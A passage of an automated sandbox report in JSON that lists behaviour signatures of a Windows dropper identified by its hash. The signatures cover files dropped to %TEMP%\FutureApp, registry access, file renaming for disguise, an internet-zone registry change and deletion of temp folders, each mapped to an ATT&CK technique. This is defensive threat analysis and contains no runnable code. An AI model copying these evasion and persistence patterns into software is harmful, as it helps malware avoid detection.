\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibClr.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Zip.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Ionic.Zip.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnAAD0.tmp\\siblog.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"Sibuia.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sibjs.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" reads file \"c:\\fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe.Local\\\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\COMCTL32.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\UXTHEME.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\USERENV.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\SETUPAPI.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\APPHELP.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\PROPSYS.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to touch file \"C:\\Windows\\system32\\DWMAPI.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe.Local\\\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\2\\babka.cmd\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F3.tmp\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F4.tmp\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\FA84AACA643D68422484D8C78E900D06102D0FBFF57598755E97705BFE419C24.EXE.LOCAL\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\2\\BABKA.CMD\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F3.TMP\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F4.TMP\"\n \"Sibuia.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\WINSPOOL.DRV\"\n \"Sibuia.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe.Local\\\"\n \"Sibuia.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SIBUIA.EXE.LOCAL\"\n \"sibjs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\WINSPOOL.DRV\"\n \"sibjs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\sibjs.exe.Local\\\"\n \"sibjs.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mscoree.dll.local\"\n \"sibjs.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\sibjs.exe.config\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" connecting to \"\\ThemeApiPort\"\n \"Sibuia.exe\" connecting to \"\\ThemeApiPort\"\n \"sibjs.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\futureapp\\0\\setup.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"Sibuia.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"sibjs.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"sibjs.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"sibjs.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"sibjs.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"sibjs.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"FA84AACA643D68422484D8C78E900D06102D0FBFF57598755E97705BFE419C24\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"Setup.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\0\\Setup.exe]- [targetUID: 00000000-00002688]\n \"Sibuia.exe\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\Sibuia.exe]- [targetUID: 00000000-00004412]\n \"Sibjs.exe\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\Sibjs.exe]- [targetUID: 00000000-00002688]\n \"Ionic.Zip.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\Ionic.Zip.dll]- [targetUID: 00000000-00004412]\n \"333.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\1\\333.exe]- [targetUID: 00000000-00004412]\n \"siblog.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\nsnAAD0.tmp\\siblog.dll]- [targetUID: 00000000-00004412]\n \"SibClr.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\SibClr.dll]- [targetUID: 00000000-00004172]\n \"Zip.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\Zip.dll]- [targetUID: 00000000-00004412]\n \"babka.cmd\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\FutureApp\\2\\babka.cmd]- [targetUID: 00000000-00004412]\n \"039F4.tmp\" has type \"data\"- Location: [%TEMP%\\FutureApp\\039F4.tmp]- [targetUID: 00000000-00004412]\n \"039F3.tmp\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\039F3.tmp]- [targetUID: 00000000-00004412]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"039F4.tmp\" has type \"data\" - Location: [%TEMP%\\FutureApp\\039F4.tmp]\n \"039F3.tmp\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\" - Location: [%TEMP%\\FutureApp\\039F3.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F3.tmp\" to \"%TEMP%\\FutureApp\\SibCa.dll\"\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F4.tmp\" to \"%TEMP%\\FutureApp\\sib.dat\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-135", "relevance": 1, "name": "Dotnet file contains function to dynamically call methods at runtime", "description": "Observed namespace \"System\" and MemberReference \"GetMethod\" in \"SibClr.dll\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"sibjs.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4510312'}\" (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4510184'}\" (UID: 00000000-00004412)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-121", "type": 6, "relevance": 3, "name": "Calls an API typically used to remove a directory", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RemoveDirectoryW\" with parameter %TEMP%\\FutureApp\\0\\ (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RemoveDirectoryW\" with parameter %TEMP%\\FutureApp\\1\\ (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RemoveDirectoryW\" with parameter %TEMP%\\FutureApp\\2\\ (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RemoveDirectoryW\" with parameter %TEMP%\\nsnAAD0.tmp\\ (UID: 00000000-00004412)", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-115", "relevance": 1, "name": "Dotnet code contains potential unpacker", "description": "Observed function \"System.Reflection.LoadFrom\" in \"SibClr.dll\"", "origin": "Static Parser", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".ndata\" is zero\n Raw size of \".bss\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb2776a0c165000080fd7f9a5c957700f0fd7f70f412004480fd7f00000000400000003f0000001d0000000080fd7f64f41200c15c957760829c771d0000000080fd7f9a5c957700f0fd7f88f412005789947780839c771317a175d8eb2776 (UID: 00000000-00004412)\n \"sibjs.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100007c54620000000000000074002e004e00450054005c004600720061006d00650077006f0072006b005c00760034002e0030002e00330030003300310039005c0063006f006e006600690067005c006d0061006300680069006e0065002e0063006f006e00660069006700000033003200 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 